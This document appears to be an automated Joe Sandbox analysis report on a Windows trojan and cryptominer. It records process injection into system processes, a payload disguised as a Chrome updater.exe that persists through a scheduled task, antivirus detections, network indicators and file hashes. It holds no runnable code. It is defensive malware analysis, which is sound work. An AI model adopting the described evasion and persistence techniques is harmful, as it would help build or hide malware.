                Hidden Files and Directories
                KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528506 Sample: ylVAEHbMLf.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for dropped file 2->69 71 Antivirus / Scanner detection for submitted sample 2->71 73 14 other signatures 2->73 10 ylVAEHbMLf.exe 4 2->10         started        14 powershell.exe 37 2->14         started        16 powershell.exe 23 2->16         started        18 2 other processes 2->18 process3 file4 59 C:\Users\user\AppData\Roaming\...\updater.exe, PE32+ 10->59 dropped 61 C:\Users\user\AppData\...\yfiogronfirx.tmp, PE32+ 10->61 dropped 87 Suspicious powershell command line found 10->87 89 Writes to foreign memory regions 10->89 91 Modifies the context of a thread in another process (thread injection) 10->91 95 4 other signatures 10->95 20 dialer.exe 1 10->20         started        93 Loading BitLocker PowerShell Module 14->93 23 conhost.exe 14->23         started        25 conhost.exe 14->25         started        27 conhost.exe 16->27         started        29 conhost.exe 18->29         started        31 conhost.exe 18->31         started        signatures5 process6 signatures7 79 Contains functionality to inject code into remote processes 20->79 81 Writes to foreign memory regions 20->81 83 Allocates memory in foreign processes 20->83 85 3 other signatures 20->85 33 svchost.exe 20->33 injected 35 lsass.exe 6 20->35 injected 38 dwm.exe 20->38 injected 42 15 other processes 20->42 40 conhost.exe 27->40         started        process8 signatures9 44 updater.exe 5 33->44         started        75 Installs new ROOT certificates 35->75 77 Writes to foreign memory regions 35->77 process10 signatures11 97 Antivirus detection for dropped file 44->97 99 Multi AV Scanner detection for dropped file 44->99 101 Suspicious powershell command line found 44->101 103 9 other signatures 44->103 47 dialer.exe 44->47         started        process12 signatures13 105 Injects code into the Windows Explorer (explorer.exe) 47->105 107 Writes to foreign memory regions 47->107 109 Allocates memory in foreign processes 47->109 111 2 other signatures 47->111 50 svchost.exe 47->50 injected 53 svchost.exe 47->53 injected 55 svchost.exe 47->55 injected 57 11 other processes 47->57 process14 dnsIp15 63 192.168.2.5 unknown unknown 50->63 65 192.168.2.7 unknown unknown 50->65

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                ylVAEHbMLf.exe55%ReversingLabsWin64.Trojan.Whisperer
                ylVAEHbMLf.exe100%AviraHEUR/AGEN.1329646
                ylVAEHbMLf.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp100%AviraHEUR/AGEN.1362356
                C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe100%AviraHEUR/AGEN.1329646
                C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe55%ReversingLabsWin64.Trojan.Whisperer
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                http://schemas.micro0%URL Reputationsafe
                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                fp2e7a.wpc.phicdn.net
                192.229.221.95
                truefalse
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1819526785.000001FA481B0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://contoso.com/Licensepowershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://crl.micpowershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://ocsp.msocsp.lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://contoso.com/Iconpowershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yqsvchost.exe, 00000011.00000003.1846316422.000001D5599B5000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.microsvchost.exe, 00000012.00000002.2989122565.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://contoso.com/powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://crl.micft.cMicRosofpowershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://aka.ms/pscore68powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          IP
                                          192.168.2.7
                                          192.168.2.5
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1528506
                                          Start date and time:2024-10-08 00:25:54 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 10m 21s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:18
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:32
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:ylVAEHbMLf.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:3fb477ee2214bf2d4ed7df2d23f159e8.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.mine.winEXE@24/79@0/2
                                          EGA Information:
                                          • Successful, ratio: 89.5%
                                          HCA Information:
                                          • Successful, ratio: 62%
                                          • Number of executed functions: 72
                                          • Number of non-executed functions: 390
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, WmiPrvSE.exe, schtasks.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, pool.hashvault.pro, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target powershell.exe, PID 2872 because it is empty
                                          • Execution Graph export aborted for target ylVAEHbMLf.exe, PID 6952 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • VT rate limit hit for: ylVAEHbMLf.exe
                                          TimeTypeDescription
                                          18:26:47API Interceptor1x Sleep call for process: ylVAEHbMLf.exe modified
                                          18:26:48API Interceptor91x Sleep call for process: powershell.exe modified
                                          18:27:01API Interceptor1x Sleep call for process: updater.exe modified
                                          18:27:24API Interceptor355057x Sleep call for process: winlogon.exe modified
                                          18:27:25API Interceptor275767x Sleep call for process: lsass.exe modified
                                          18:27:26API Interceptor5801x Sleep call for process: svchost.exe modified
                                          18:27:28API Interceptor333346x Sleep call for process: dwm.exe modified
                                          18:27:40API Interceptor1155x Sleep call for process: dialer.exe modified
                                          18:27:43API Interceptor221x Sleep call for process: spoolsv.exe modified
                                          23:26:56Task SchedulerRun new task: HtfsFileManager path: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          fp2e7a.wpc.phicdn.netbCnarg2O62.exeGet hashmaliciousSmokeLoaderBrowse
                                          • 192.229.221.95
                                          9Y6R8fs0wd.exeGet hashmaliciousLummaCBrowse
                                          • 192.229.221.95
                                          http://xdr.euw31usea1-carbonhelixbytedandomaincontrolpanele-for-github.sentinelone.net/Get hashmaliciousUnknownBrowse
                                          • 192.229.221.95
                                          PFW1cgN8EK.exeGet hashmaliciousLummaCBrowse
                                          • 192.229.221.95
                                          https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.ht.zpdzwq?v=frudxdBjlfmjfqymhfwj.ht.pjd.kwjsy___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpiNGZlZGFhNjcxOTBhYjU4MTE5MjBlZTRiYTAxZmUwMTo3OmIxYWM6MDg1ODNlNjljZDkwNThkM2ZiM2RjYTI4MzFjZGY4NGFmMTYyZTlhYmVjYWYxY2Q4MmNkZDhiNmFmOWVkOWUxOTpoOlQ6VA#Sm9hbi5LbmlwcGVuQEVsa2F5LkNvbQ==Get hashmaliciousUnknownBrowse
                                          • 192.229.221.95
                                          SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                          • 192.229.221.95
                                          utmggBCMML.exeGet hashmaliciousLummaCBrowse
                                          • 192.229.221.95
                                          Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                          • 192.229.221.95
                                          https://login.stmarytx.edu/cas/logout?service=http%3A%2F%2Fgoogle.com%2Famp%2Fmatrikaengineeringworks.com/hebc/?#?m=bWVsaXNzYWdAd2Utd29ybGR3aWRlLmNvbQ==Get hashmaliciousUnknownBrowse
                                          • 192.229.221.95
                                          https://communications-chamber-confidentiality-limitation.trycloudflare.com/spec/#bWNhcnR3cmlnaHRAY2hlbXVuZ2NhbmFsLmNvbQ==Get hashmaliciousUnknownBrowse
                                          • 192.229.221.95
                                          No context
                                          No context
                                          No context
                                          Process:C:\Windows\System32\lsass.exe
                                          File Type:very short file (no magic)
                                          Category:modified
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:93B885ADFE0DA089CDF634904FD59F71
                                          SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                          SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                          SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                          Malicious:false
                                          Preview:.
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):64
                                          Entropy (8bit):0.34726597513537405
                                          Encrypted:false
                                          SSDEEP:3:Nlll:Nll
                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                          Malicious:false
                                          Preview:@...e...........................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
